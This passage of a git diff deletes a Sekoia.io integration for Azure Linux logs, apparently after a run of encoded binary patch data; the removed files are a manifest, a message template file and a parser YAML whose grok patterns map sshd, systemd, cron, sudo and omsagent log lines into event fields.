z`?1)GS3jGguN1KPm0CMJH-ouew*p}^FSqlKfPIJl%?!zB#SIDIp_BgyL~1?ndml9@
zDKyP}>?B}*7YdGJ8ijh*qkU<7ge<X^d0L{go<v~YcdI4Staw8}0NU7;@Dk~}g(sKd
zmu*|-9Y4Iug}*yy_fDmd&myqtRxLE`#tTmPj+IG8ZEFiqSz4ip_U@WBzmmW%hFW9w
zM;NP$8q1Gi!xV>%NXF>`;n7O*{nyfK?Z+*r4lo|+YL?Wlg{hZAUkpF+n^lGbFTf)(
z!uYRwBAu48Rnc%3XynNc4<sutA_HEOu{(%~sg&mtmjM;7eL1b(n)jHl71@u^W)Gx-
zze^ZS{D)wKhq32OaHE-$M>tbc^#T*uJ1%KV-sC<2gKGZUGxT8@+&u_j=Z%0>J{nV+
zM92dG>?!69Z%6_cr6MzqjLC=xoSjT?3udd5gWce3DzgmNydl+r4`Zh0!NI`;j$G~b
zMcwniUrX~l@LLwcG+7vbSuFi~6x_$mHX$)joQUD|L0n$=92eewYvIaTeAAhm?l_Zu
z(`U)fwo7I1euP62)>&H<f-RAZJR^-c5Xyh2$8h+3Pd>QPL!W7AZnyV^_^Xn@zyCge
zFL|U75yXe?b|1Xz=Ga(Qn^Z)Xxiu;;cf+TcayF&Qbw0}F+PL|xFQ%pMQH<`8QS*!%
z%Yh7o<hQu^efU0WP$N^s_IlCQ&_@fgP6*p1o4&Qh-gmuKIxGRI3-H5!8;#>z8$Kw_
z2O9PA`d3yWtu2eTH?!;tUk+rs4!C>0Sk_O)A;7Eewxy>ZNRYD5TR6ZM+P4*ooC{BC
znoEFpJ7-H7!xIuk<GC<<BaaL!AUiGJOcqNr$gZ%&VkmFq2`7xUFMZ?FQVIxC3J^@#
z_ZaGJe~$(#V-IV{V@L7h|BaZWcL@{gaZB>1$u11I(BGbe7xijY`0q3LRd0EJ_$BPV
ziZ!ho&$x1=L;!}mlJ77y8)XMA$LWhYeca!L_p!w~sE*Sd%bhiOGoQSJ;+N+bdd8aN
z#`hA<^|`khP;w^DwwfjdGM{{M$A;cs*l?H=etiQ%=8*q>*;V=tkpQnK8nCM5+IVDn
z9mRiQYNX4<C`Yf~MYVi7!qx3!56q%FUcA7BG=nSw7n76FpYBLz1-Bqm`tyBd(U<N9
z@DTrla7{K7)q!41o?Ej(s$sGoT1`gdv27`L`S(mKV?z}S^MoevowoD^+ofF@L0=VE
zPPTcUf=85+@|n)Z0wvrImcOFp_lmvi!L&>vS7uLD>T#8U!bpLrt;lxO{B>%a7>4yO
zK~H;aDG6eczqHAzVtbJ@x!WSY)tF9FvZo4yoP1RjgG}QCCk)<wf2k?{ev3`;Lq~t_
zW!aOVq3s`4!3UkZ1mZ99a{>?DMdSp+p3tD@L$y~5)1Dw92-!zx)Jz%_0J8sI*_WYn
z8^RZW^7ro_8sNaQ9?#N0^qOyL)+i^8u4JC~<Oc-@=K;+Tx2LO)2CCKJX+^DFcKZlY
z{T{|fll@*K!5j9PRr*{AC%F#FE9SF9{GXb7q!Y@m9UY-1U3wo$e|3_{4iM}%HPLjq
zb*35UB%yzE-Z~Tf=MVwz(<o5Dk*GaOwhk4#6L=QO|F_sJ#%teSD6~oT&Le)?$QXBE
z0j_IvB;5DDr3z!`R%|8p?yT+8(!-?h1co+pq2rKOcY`sywG9s4PKoYG0r)0gXIxH$
zBTBk+q5^y2D4lxJ&P|Z3QVV_D{F;jD)9)8yomIP7<SjO7tm}3*ztgD^CS{VIyuj0k
z&b_P<+hE3z%W(s1ne#OfV#8JeT6KV2Gxg`^hOAGkmodTm6@#KmFZ-;oF?iQ{GH=f(
zq~_~v51eizmNl2^Dv@lik3D{xWo5LZ#g6~6C!3T&-ecBb1SF>;P1@3woe`;gW{`+s
z?&h6WHXV~|BCTSUZ6-ww34VKM&!b{m&r>_9<zdX9>GZYRo2ffF<s5VpM6$<zoqAjS
z<`FLu_{~4fGrYWnAMRs*`>+}#NU1hZJ_YPFNHvQtcq}*L_Md$kVm2ja^+P}ueTO)C
zkSkwYNLO$q*`+>pQh{@Dx;lw+M83f)7K9&i|Fz@W816#v9V*wwwN*V|SYRU|NCl+i
zaWdCH3y@m?;jDQ1{a05KVK7g?<Wu+L`}|LF%Fv_<T#aToV03#hI+oF@1h><7>c4A@
zO#Q%3_u`iVHR<~S+f1bGfMigSU6eh8qMM2$=vOp%`|I;WD~IR9tMiDESc(VqwC2J1
zk?#<9CvDD0B=WX8RipB%G6v9*VprE_Q~W+8(>5jR67f40$<)j!*vxfd%UU-|TK=g6
zr<>obt5$GekQq`ltTR+wpqy-Q1syl3xGX(C1{oY8lS|{R;7X%O${WdPxM}!j_D`Ix
zjxgtkppZWdfsRc)kqf^`Dq4~s$>JBngB_ZhspUQ?9!@{`PuD%oAGsS)!UKtp#h_vX
zZ7cRS&%OkxUyk=B_tfBs58AOU3m0<a(Slq}np;sX#fyIWOb<=1&e3=+<^uEvww8-D
zViyEX7>i6Dg()ra%R&WiX+m&A-&<Fk8vRE*wf3fr(@$n#4!gzMC;6BQSu-5h+4|Va
z|7)G?O9yQe#&2<^R$=MVw4T<G&v5V%n<xp^D^!Pel!1|5@9*i0vWlrw@VvDd&;r`F
z<`?B3b;41UNTfeTPWda;a^2_BlC^M)W+F_oyL{IAD?@yNy2l-F;Ys2{>I^;UmOK5Z
zT@+4c5U#nJtcX6y;)t;8KhpUh%=IhbE8D20#+WldwpsLqwkAsFyI@S7aN>^&j!t*(
zD>pnOOm;J1`H;cez6|ix1resMsZS+a-{145!#u`-6_n4>oC1FfsQmLPFD5yAS%sK7
zuW&y3oDn&Z+eqEL)M_!6;G1*n_F{nIF@w2)j+pNOr}q;p{<eHFrxNLz-ZS1TB!taf
z2w|tR7!D!4UCT!(JRd!5IUdZ;MTJU)cA8q6kXYkJ6&&gtJVoF2FZZ~L?`tSm$MGNj
zk&sEYo^r)$*N<=lzX(5F#|0K`VV1yYcO)h|RNF{ewpZaHW(!n!7~1e*D7faPS|YR2
zc9#l<!y8z$YI_d3m8E5CE)ThqNYI{-T-Lwk0Fc93ro_7>Rdjk6;y9b(UI+Fm1JV|Q
z?@QfS)&55-2#~gtvFLFx55&W+hb4b?0w(XgjE?)FXn&V<luPAvC|}3(bWfBp$+hS;
zfE{hTo>6UAHys*YG*vH|YbLu@%A+7@wyF*HX|cNPqKl_;!s3!QVN|dba{dQj*HGsa
z&4gIQo9AUH0(O<9Q}QE$348Uy4{PeOe}-FTV<kMyu$7G9*bg&J%~qtL*fon7E|yAH
z%*sU)IN4!54dmc9l$3E(&a+llQ^~AqZ%utHjOOA<<o2EvT)&G$J#1%-$K<bxh5Er4
z8y}{7x2Dec-u-9Ko_nVayKaZ5&1};X3_{5Ca;x{d*&Y-2G&e4_E*P2FnWkKze2XC@
zGu*Uv0E0Z7hcgAYYDdOYtQ+)_jI8_1!KZ867tG{$t=qj(^zD%oia-ILe8bGg#4ew_
z8v~rhVJ5{p;K7btI0?zwHDV6@S@J4f_3bb<94S)1$h^L8bU++hB@|!094BvIhyRW>
z&FipQb&yD3cxni+ITg@g5xS$IBAvrjo-W_a`{6~1BcIF2Zdip!|Lj`ao3pfOwT1p+
zbDBGnqOHiPYajd0m@se1mBG~ZE=3nWOZb^Aj2<aC0ItezT{c*Z?$T~kc5Kx)%pLv6
zBfnwEj{$Fu+d<M;zqY4JK70}50DZ5OVQ&`fAOD@#aE0F}Xo{BOyZ3ky(O>^!9e<$m
zndY##>VtiWJegc5w@2&d*tspA&Gi;sDJ(g%I_@VxO1W)mX)05X8||Y5nr7l}CGQ^n
z$9pOcOUHkq86JRs7P(-#{G}sPNlm&95@LR@B<_eVQ5pUiW{^^c%yJE74G3o7wza;E
zhLJ<6D^4PD(mH5QR^*{Sd2gh?ArMLv5lvBSa53^;0rQ?l!Qs{s?9kCn+f-3a8{1rZ
z(`RNIh#+BBlvLkuTm%pHD$@z1300&OM@AaLqTPhAff7FrTruzHD}Js{w655<_NJ1+
z1r=3MORvk{7RY=~sMXtC7`02`aP>b#_`{hJPEz(DJ6q4wZ3LWMDkO6>B(nrpde%2v
z-VmH$yK{}+_LFF$KNZRbQ6l{r9J+}}z=>jA;xm#u5_`KFsTC6oIEM@70io)iM8r#<
zRLf?@(M68X$<e1FKzQXaqFk)h70E$}`^v1<CI*xRlsAF<??;K1n9zetMR`OX##|H0
z%M=*jr>PTs%lTW4T`bW3uUyNa$iBuMOiCNEO#?t%FO72RZs#C4<IW1jE=@6~?HFIh
zTpRtmbu0E^*FTK@>!=4c3Hjy^QVg;ziuL3Jl!^uqsA}*VeLjXha=n<7jJ=mJ`>38l
z0&UvKCr&j-(4TgEn+7C8r}F|@KZSD|9i{+v2705sUa{3v_wjWRe}!)BdKRF)EHl|k
z<h2>yMGDz%QvyGfo&@;EVN9ND0>oa{Se*iPBLYXSepIHavg($_+Jo6*XQYH0&-kcQ
zfNh<{tz8SKzt0`f{=i~RNfsYFF6r9NJR~7)&oLmQDdjUiQ-d1$%ngkyTC}GEDuLV{
z%Q0l=`5Cvt(FRu`E~^GrH+&l)#h8@K!ddx!Jpwwv3K$yy644A&geUFHJB%x9t$)Cb
zccc+PtKU0DYyYp&2Pl8;4tn~LpU*eIU30`~9GmpwC+%gG)R613u!v$G7Yo8hK?D^Z
zBPPXrkyMW=DJwA%>3jQC4Dv;j-ui5u<TJHCOh`$2nhi7B3JJ@JTzu3R75F*ABya%C
ztZ>g;=qr!0uG8a&rOi3Nc{}^4SM_L^o~bNd56e7<x~&Ngt9?D@*c&B1rA)j}&|5C6
zBN&<j1Kjn4VOF`PStyE!)|GY4RW6gSWw#kzRHP-!);I0Mqzi0(=SRNfe%JE%Y$xr$
zTFnJ`&_H@`%x$Q~5=b>ul%=Migo>BX27d+wx+0d*5hxYOR~A%ZvCr6RSBfL7ZaKZd
zXZ~=gtG~TJ%WDEi*rg^%0wM2Xv*6%0JJe<2I*5VVJk8%-7t@jNU(L1idheGVggAC$
zf2%Oh#>t;y;-q=|Raxx$WlCgPhqB<UbWCoJe%L#95Ls~w2;~1U?kwWWN%z$2HnMPg
z^XEqQjU$^)pr!j@t07iNczrdM{U-5??n0c>2|`PblPu?cNjQT$KDIp4`!LL6hcmsM
z#^Qi-^>-zcL_f1M_lG3yN!qKqIqIZn2i>gbTG{?2Zuld>66o&StH!gC^l?xk!vb-E
zr(4qF<tAdVmpyMb@QVKpv@0>CeJMZCN36t@!d{9m&*sRMaY7gYYR7=kvZtW&e*u#h
z?*KhQ!<Q|&%5EU)a&|fhrkU?XL9Fn7(3Z+dXPD!e>Ow5Ktpb*N4tO^B6C^28Ni+`s
zW@m7jP`^<lMQ^Y>N50*Ok>!JeDM;*e^OII0@uva_4PO;{%LM$SH?1cPTP|$b7Qs#v
zb1lMG{|+NK51l+^1d-SO{6t6!QmJY*gut<c_7=_kc5TS6Y+h0-&0Te0Ox<u$C^4Ni
z7gl;N&J<0fnO35IohltOnmp<ZrXDdiu!mdu;uBIbq<a<}^-*&9jt3|WRR52XT@F4{
zR#qm2W_vH9V>_a@uaf!Y{a0k04m4HUEvp~>B04b#3w2jrcNHEUPV|U=jajLA+|^Cn
z+tML4AemQ4<wNL~;h?5epIzt(Oz1-QNUBV9>M5;JNiTPwV{jiv?d2gKYdx5tk2jMn
z<J}Ovb$;Txrs8nuQDWq)Q}nx(<6hDg_jq~&J3n88`&j8ow@qfyw)O;u2F7PHzneOb
zu}JJXS}uK|?e!|f#^Oj6-VK^f)?<G+@Y4zpG1(Z$m>fK95U#qLT0tR8$23iiLK&a7
zymaDA6QLwjx%I@R8`3z`a;k>$12%wP0=bv8hhD%N|5<S3t1gn9%ylFad{esBGiBSZ
z*z`w(hedAWw6a&2h>tx*V&5`L%fnJJWiTLnn{nhLOH2M1LrTaJg~!m^eiwtQ-%2rZ
z*f~0J9&+D5z9CNw9;iIIz?wwI*iMi(*jUUy40*M@oXbdD{cF-cA}Spgprpw|swph0
zQgBg4N^{cS?1U*8`|}EXZPMx;ZGF%O=3_aLjI!a;a$;qSR97w^Sa9TN+B{w1178CK
z*4xDdth7OD+(oG?O-ioHnoOFqEg>@>H4dacS=tPYoy_S9Wzw<Vy-QShfTqULTF6`q
zM{&D-vxtI?N(khEcJUEhZ_x*vlca6=qg^{PvrM#zZqj>U3eOMMe9|nTuXiZ`KlX+G
zc<S@f{8F;bU#*!?%fnZ5=FvNHzA}qoOK!N~ht1f_to=--8T+;JJ-d<CLLNheHwJv!
zstJ6Uue-ok(gX>1KLI_$n4(Vfw5}RrhkZ;eaXM0OR=mzLF@HI<X&%uK+dl)ggNh$*
zDZKc(!i<JSl-z~7X?sCUU4V<xkyB%)E3pDin=gHsQ@a2$aTg=xqBuvaM?h?<oYWoO
z+9G+CV@I4J8bIxOyEAW;mkh#fw4VZ<)1qdOWbcW3XYqH3R5`ByxF>~a_abZuI<JLC
zJdG8I<sd6)-)c8g<Hc5qO@b6249wa_t2ll(t6jzWt42l6;I<osajgQM@q6>vbLwjY
zd@E0w3)HbzUOSSPP+X77Fmv9u*a)!bi(a6Oc<ou1-~;)Bhhv4R`i)B?FTXgdC}9E?
zSy7jJ*MF-4dBVS*y48Sw1n^O29WjaCa>mu!$Bjq&6B@bmR2rc=1!T8vMfODm)aFs`
zS};IzmPH6QlNwZ-OzHI8#?=faUf0EGMiWVa9(G6nu`jPV2_8x0QtYEBF%?WhJ>gNM
zP|=p^2M$TESHNVuRS=6%i}-pS^RYI_xeQ;a2aSE<6Az4xAW0ud@($o%F8CO@Q%nQC
z*>l^$9tbsR{|l6Xs16c~rv5H{*}*b~9Qx&Di<~+ItgeO6My6g;>8PiLR3wv9{-t6n
zX+s0Hrf&!m0Qx<A7lY*|ek4IYv)_SVC_%pFR8@vU7s=vncP(APSvflVHPwc}r;w8$
zIPPZorNuN#*m&>P!1&LX>v)0NU#Zoy5-b2ur3Y(OuFf{CmWL6Z#TAS$>pTAd8`1(y
zN!IY4!zLEpcqM&?A;WZ`qH>CVaDnvOV%>)4hWRQ7Vk3^0nDD-Na=0>MeTmF6Ebod^
zTk1#AS@P<wd`O^?zZh!t%)NLrRpYnOc6k7#b5W{PIGEoay>sK3sW!;u57De~py?L>
zj4#9*rlz#V5UXo=-Xc+7Xck%BTW$nFU*X=F#`lRHA^&M2g+4dW&gcQQ_w23cub1|Y
zR1|ZQ?OJ10J&yH`xG~a+bri?-ce=R|haHXcJJZ;QKN(x}Y5QS<u#?BuVr9E`k<Ei-
z5viA}WpOk*=xX})aKsUqE#J#DSrzSTXT?rL#@_)%{dTUAuQ`^`8lTqVgOtwW9E_vV
zc`I+@-3<>#B-6aFP$d#Mfn*Xn4P42A$l`i|q`Dxi;2X<ih&PFTe5+ijqY0DmQ-Y#V
z>2*kI5dr>4fv28gnk~iDg*%U|J)Jyf2F)D<rYDu}n+jw8vyOXRt?17Gt6h~h$Lx%Z
zTTsI!>c{0Pjw=ShJb9y5NcWAHTWPmA-pOIPFg8O{049C}fDMpybQ_mz`A$UU=o;-`
zJ!@)ygc+?gEfe<9M<&q?;+;f*RiH$$2R5ub#2@6>9x_9t@-}?W9k$;5GW!ifia3@$
zmPg9L>L)$_MuS~}M_OQQMhnvhCIXjc#=5}J^`unF8FI1XAm08Ab|aZB2Rr{Qhfc^}
zeh+#>+_+IYRH*$@D!9alO6e>x70bH`dNS@QVXt#W@~SJsr-Yx(!*LSq-&{#y%JDIZ
zm-<Rg6Ma1wM1z3QBKqTU1OopS_=J-(=*RGBSz*3~H=)sE=Vm)?aR2*_w&-<acpDEw
zUZs<px}ab&2|x4f9OJAp>6Y{qJ8XTQ_3sbBCF>jNCKLN#Yv=yXgaXEKOBpF!&dHf*
z&T$_?HJeKp^~hx%L~@&3=)`P@lFgyV;Ut%BZAKTu7@?T4nM-bknNx{~@zlaei!HZh
z7&_~JIPVYNAHVO<@ArAWpBJ{ADCfq=gRHhT@#xyAsRS<!SxdlmgIRsD7Fo)DOdPtu
zoxStKH@WlD2LuNdcN0I{JHAK1?eqQmB|-}p@!M`*UC~@Gq3CIRyi-s3&+)<%(cPVv
zEC*niC<uq^_qf49-hIOqnAN&t(U>m{`DwSPhX2@eqKethOS$*#gOU?^zVLwShORa2
z65DIbiXyXU)-T3_Ve>W3bS6SLuuh(8^9)=o+X+@2#aoJhl2Tj2e5;2+2p{P~T3kri
zDWT=xg6Qs#bWvS~jcOECO!$V->`n%_j2(jn*)qk%*nHQUM0}%3MLnWP=VBfPmc*}2
zOOyIf@)?OBY1~+T3OwWlbu*g8B-733#84UVc@v^KX_TmB#!*?Vvupvh2T~8Oe#w6b
zeVUsoZo4JHaZ}a=xy3fnslmiYZ~Lsg2R)UMiTA;WNt%rn3>mSzf7lJf95A=J`i7f?
z{a}1Ac8sw~cWLi9<vYQ+-E#^<I5R?o!Rc^27bL~MCYbtOQ3GK4!?dHNo!b*@8Bqx$
z4_n|W{waceHP~v2@Y5ZyyuE;w9v$tX)6SF>oh*K#CxWEa7z6jJOP5M6oweD84PYw2
zh-|VFr6(z|kX~;VkINZo%~+c4T7Qo90HEP`qcpr+7BJ4kx9o+d>ZZ^S8L?6wYI8``
z?~YD-?%pHZ&PAP49?Fn#jLy-3SQJ+TK1jvE#mf#C?4E$jjmC^g$djzDndRvy1G(uO
zD*H6>MI@xJS_W0AEjG>xepk(}{snOIvU94k0-}B-`x`#*YcED`ydK6a)e9~Ydzc+s
z!wbAoT~*|(T{1^6^%Sgg=(vnyf<{G;&X^q9{F5D6KNjEdQ51}o2%miSrB0e3NqV=~
zq4p_SxR&|7ftOwJNPGyL2_8qmK0EU*E3pM5!mv^NrOqL6n$Ne;Xw5pq0LiR?$0h?Z
zc57^(Ofp>#)4avzZiqHSi@Mvv<~=)GB7NK1mFJFw3)fg&CgEAb_MV3mo4Pk}JE-0e
zH#Ezkuijeg4@=jA1CPhn40c5{f+E!8>%if$*AsNH;ZWDXFFeEpxSOAT8!@BiwRz1D
zu(8gCd>SP_sKr&rAPu5eXYCt9uIH3n=Tar&w-TmA<w0Npl$e=E8WMTH33TO`N1b`<
z{#9zk$q$>Y!>kkCGp+kuRMw>i+Kd-!KhmvNpM*w;<;(svMEhoqNFY-Rg(T$(gx4DO
zgjFt{f<*h-%Z6tIcu{V!q6(_mQN0(1u=Le2mfNJp$gRZVa6B%BaQ(bd$FF&l69fy;
zQjtcBDGB3Y9;~j8q#JHL_9HC2DsVX<vO8%OYnC%pP;GcP>`G%y-d*P3MgWlUa3yW7
z!`y9_l8wFNU%~@qZ$ufcqe}5DL*!?j#1UXQ-H4%B<>1V3*PLeehjlGFmfGFF9q}mU
z$unV4^uEC%?!OIL+jo9&a5WNXntJE9T3t|#0@ai<8FU{|f2qfHGnw!4fLu1zPTP4!
z8DbA+y&9e+qb{HqSfP6F^(2lmkTf}x5_QzyHVa-z8RBGuxx0#_pBXegC%2`d!qktd
zKg>byKB{pVp9Edt`}wt}lh0R2=Hj|>)qLd5h73E>+uc=_v`xsXgz^vbwy%}XdBM~D
zFlrjWePoV5^z(b)&aO)su+n*h#VHl`pF&|_RdjB~`6lBGr%F#WPoPh0x>zbN#u;Cz
zqRuByD_t1?aUlhzp;`d#Z6e_S)q7Idw10hHZSz*uN~_%h=dq!J3K{;!A`VSng}4`b
zcG`{KK+fSiDQ7?{xOehq)-gfp?=R`ECB9)z;2HZ-{g(332%~Vlf##6uo#qt-E(#Xs
yOyTy;lY1Z$c}M&IFVQ^+21eB*6@DlBmcA=PDS%pCQ9MmaF>dEPoa)bp{q-NES7Gb`

diff --git a/Azure/azure-linux/_meta/manifest.yml b/Azure/azure-linux/_meta/manifest.yml
deleted file mode 100644
index 862c62098..000000000
--- a/Azure/azure-linux/_meta/manifest.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-uuid: 162064f0-c594-455e-ac24-2d7129137688
-name: Azure Linux [DEPRECATED]
-slug: azure-linux
-description: >-
-  Azure Linux is a Linux Virtual Machines service developed and managed by Microsoft
-  Corp.
-
-  Sending Azure Linux logs to Sekoia.io allows to discover system compromise, account
-  take over, malware installation.
-data_sources:
-  Authentication logs: PAM authentication mechanism
-  Process command-line parameters: Common Linux processes (cron, ssh, sudo)
-  Process use of network: SSH and PAM daemon
diff --git a/Azure/azure-linux/_meta/smart-descriptions.json b/Azure/azure-linux/_meta/smart-descriptions.json
deleted file mode 100644
index cdefa7919..000000000
--- a/Azure/azure-linux/_meta/smart-descriptions.json
+++ /dev/null
@@ -1,24 +0,0 @@
-[
-    {
-        "value": "{log.level} log received on {log.hostname}: {azure_linux.message}",
-        "conditions": [
-            {
-                "field": "azure_linux.message"
-            },
-            {
-                "field": "log.level"
-            },
-            {
-                "field": "log.hostname"
-            }
-        ]
-    },
-    {
-        "value": "{azure_linux.message}",
-        "conditions": [
-            {
-                "field": "azure_linux.message"
-            }
-        ]
-    }
-]
diff --git a/Azure/azure-linux/ingest/parser.yml b/Azure/azure-linux/ingest/parser.yml
deleted file mode 100644
index bd72b5550..000000000
--- a/Azure/azure-linux/ingest/parser.yml
+++ /dev/null
@@ -1,257 +0,0 @@
-name: untitled-name
-pipeline:
-  - name: json_event
-    external:
-      name: json.parse-json
-      properties:
-        input_field: "{{original.message}}"
-        output_field: message
-  - name: stage2
-    external: null
-    filter: '{{"properties" in json_event.message}}'
-  - name: grok_sshd
-    filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "sshd"}}'
-    external:
-      name: grok.match
-      properties:
-        input_field: "{{json_event.message.properties.Msg}}"
-        output_field: result
-        pattern: "%{SSHD_INFO}|%{SSHD_ERROR}"
-        custom_patterns:
-          SSHD_INFO: "%{SSHD_INFO_ACCEPTED}|%{SSHD_INFO_DISCONNECTION}"
-          SSHD_ERROR: >-
-            %{SSHD_ERROR_IDENTIFICATION}|%{SSHD_ERROR_INVALID_USER}|%{SSHD_ERROR_DISCONNECTING_USER}|%{SSHD_ERROR_FOR_USER}
-          SSHD_MESSAGE_USER: "%{SSHD_MESSAGE_USER_QUALITY} %{USERNAME:user_name}"
-          SSHD_INFO_ACCEPTED: >-
-            Accepted %{NOTSPACE} for %{USERNAME:user_name} from
-            %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}%{GREEDYDATA}
-          SSHD_CLIENT_ADDRESS: "%{IP:source_ip}|%{HOSTNAME:source_domain}"
-          SSHD_ERROR_FOR_USER: >-
-            error: %{GREEDYDATA} for %{SSHD_MESSAGE_USER} from
-            %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}%{GREEDYDATA}
-          SSHD_INFO_DISCONNECTED: >-
-            Disconnected from(%{SPACE}%{SSHD_MESSAGE_USER})?
-            %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}( \[preauth\])?
-          SSHD_ERROR_BAD_PROTOCOL: >-
-            %{SSHD_MESSAGE_BAD_PROTOCOL} identification '%{GREEDYDATA}' from
-            %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}
-          SSHD_ERROR_INVALID_USER: >-
-            %{SSHD_MESSAGE_INVALID_USER} %{USERNAME:user_name} from
-            %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}
-          SSHD_INFO_DISCONNECTION: >-
-            %{SSHD_INFO_CONNECTION_CLOSED}|%{SSHD_INFO_DISCONNECTED}|%{SSHD_INFO_RECEIVED_DISCONNECT}
-          SSHD_ERROR_IDENTIFICATION: "%{SSHD_ERROR_BAD_PROTOCOL}|%{SSHD_ERROR_IDENTIFICATION_NOT_RECEIVED}"
-          SSHD_MESSAGE_BAD_PROTOCOL: Bad protocol version
-          SSHD_MESSAGE_ILLEGAL_USER: (I|i)llegal user
-          SSHD_MESSAGE_INVALID_USER: (I|i)nvalid user
-          SSHD_MESSAGE_USER_QUALITY: >-
-            %{SSHD_MESSAGE_AUTHENTICATING_USER}|%{SSHD_MESSAGE_ILLEGAL_USER}|%{SSHD_MESSAGE_INVALID_USER}
-          SSHD_INFO_CONNECTION_CLOSED: >-
-            Connection closed by(%{SPACE}%{SSHD_MESSAGE_USER})?
-            %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}( \[preauth\])?
-          SSHD_ERROR_DISCONNECTING_USER: >-
-            Disconnecting %{SSHD_MESSAGE_USER} %{SSHD_CLIENT_ADDRESS} port
-            %{NUMBER:source_port}: %{GREEDYDATA} \[preauth\]
-          SSHD_INFO_RECEIVED_DISCONNECT: >-
-            Received disconnect from %{SSHD_CLIENT_ADDRESS} port
-            %{NUMBER:source_port}:%{INT}:%{GREEDYDATA}(\[preauth\])?
-          SSHD_MESSAGE_AUTHENTICATING_USER: (A|a)uthenticating user
-          SSHD_ERROR_IDENTIFICATION_NOT_RECEIVED: >-
-            %{SSHD_MESSAGE_IDENTIFICATION_NOT_RECEIVED} string from
-            %{SSHD_CLIENT_ADDRESS} port %{NUMBER:source_port}
-          SSHD_MESSAGE_IDENTIFICATION_NOT_RECEIVED: Did not receive identification
-  - name: sshd
-    filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "sshd"}}'
-    external: null
-  - name: grok_systemd
-    filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "systemd"}}'
-    external:
-      name: grok.match
-      properties:
-        input_field: "{{json_event.message.properties.Msg}}"
-        output_field: result
-        pattern: >-
-          %{GREEDYDATA:systemd_observation} %{INT} of user
-          %{USERNAME:user_name}.
-        custom_patterns: {}
-  - name: systemd
-    filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "systemd"}}'
-    external: null
-  - name: grok_crond
-    filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "CROND"}}'
-    external:
-      name: grok.match
-      properties:
-        input_field: "{{json_event.message.properties.Msg}}"
-        output_field: result
-        pattern: >-
-          \(%{USERNAME:user_name}\) CMD
-          \((%{CMD_WITH_PATH}|%{GREEDYDATA:process_args})\)
-        custom_patterns:
-          CMD_WITH_PATH: "%{UNIXPATH:process_executable} %{GREEDYDATA:process_args}"
-  - name: crond
-    filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "CROND"}}'
-    external: null
-  - name: grok_sudo
-    filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "sudo"}}'
-    external:
-      name: grok.match
-      properties:
-        input_field: "{{json_event.message.properties.Msg}}"
-        output_field: result
-        pattern: "%{SUDO_USER}|%{SUDO_WRONG_PASSWORD}|%{SUDO_CONV_FAILED}"
-        custom_patterns:
-          SUDO_USER: >-
-            pam_%{GREEDYDATA}\(%{GREEDYDATA:action_name}\):
-            %{GREEDYDATA:sudo_observation} for user
-            %{USERNAME:user_name}(%{GREEDYDATA})?
-          SUDO_CONV_FAILED: 'pam_%{GREEDYDATA}\(%{GREEDYDATA:action_name}\): conversation failed'
-          SUDO_WRONG_PASSWORD: >-
-            pam_%{GREEDYDATA}\(%{GREEDYDATA:action_name}\): auth could not
-            identify password for \[%{USERNAME:user_name}\]
-  - name: sudo
-    filter: '{{"properties" in json_event.message and json_event.message.properties.ident == "sudo"}}'
-    external: null
-  - name: grok_omsagent
-    filter: '{{"properties" in json_event.message and json_event.message.properties.Msg is defined }}'
-    external:
-      name: grok.match
-      properties:
-        input_field: "{{json_event.message.properties.Msg}}"
-        output_field: result
-        pattern: "omsagent : %{GREEDYDATA:omsagent_message}"
-        custom_patterns: {}
-  - name: omsagent
-    filter: '{{"properties" in json_event.message and grok_omsagent and grok_omsagent.result.omsagent_message != null }}'
-    external:
-      name: kv.parse-kv
-      properties:
-        input_field: "{{ grok_omsagent.result.omsagent_message }}"
-        output_field: result
-        value_sep: "="
-        item_sep: \s;\s
-  - name: grok2_omsagent
-    filter: '{{"properties" in json_event.message and grok_omsagent and grok_omsagent.result.omsagent_message != null }}'
-    external:
-      name: grok.match
-      properties:
-        input_field: "{{omsagent.result.COMMAND }}"
-        output_field: result
-        pattern: "%{UNIXPATH:process_executable}( %{GREEDYDATA:process_args})?"
-        custom_patterns: {}
-  - name: omsagent2
-    filter: '{{"properties" in json_event.message and grok_omsagent and grok_omsagent.result.omsagent_message != null }}'
-    external: null
-  - name: action-outcome
-    filter: >-
-      {{"properties" in json_event.message and
-      json_event.message.properties.ident == "systemd" or
-      json_event.message.properties.ident == "sudo"}}
-    external: null
-stages:
-  stage2:
-    actions:
-      - set:
-          log.level: "{{json_event.message.level}}"
-          log.hostname: "{{json_event.message.properties.hostname}}"
-          "@timestamp": "{{json_event.message.time}}"
-          azure_linux.message: "{{json_event.message.properties.Msg}}"
-        name: set
-      - set:
-          process.pid: "{{json_event.message.properties.pid}}"
-        name: set
-        filter: '{{json_event.message.properties.ident != "CROND"}}'
-      - set:
-          process.parent.pid: "{{json_event.message.properties.pid}}"
-        name: set
-        filter: '{{json_event.message.properties.ident == "CROND"}}'
-      - set:
-          os.family: linux
-          os.platform: linux
-        name: set
-      - dictionary:
-          err: error
-          crit: critical
-          info: info
-          warn: warn
-          error: error
-          notice: info
-          critical: critical
-        mapping:
-          log.level: log.level
-        name: translate
-  sshd:
-    actions:
-      - set:
-          source.ip: "{{ grok_sshd.result.source_ip }}"
-        filter: "{{ grok_sshd.result.source_ip | is_ipaddress}}"
-
-      - set:
-          user.name: "{{ grok_sshd.result.user_name }}"
-          source.port: "{{ grok_sshd.result.source_port }}"
-          source.domain: "{{ grok_sshd.result.source_domain }}"
-        name: set
-  systemd:
-    actions:
-      - set:
-          user.name: "{{ grok_systemd.result.user_name }}"
-          action.type: "{{ grok_systemd.result.systemd_observation }}"
-        name: set
-      - set:
-          action.name: systemd:session
-          action.type: open
-        filter: '{{ grok_systemd.result.systemd_observation == "Started Session" }}'
-        name: set
-  crond:
-    actions:
-      - set:
-          user.name: "{{ grok_crond.result.user_name }}"
-          process.command_line: '{{ [grok_crond.result.process_executable, grok_crond.result.process_args]|select|join(" ") }}'
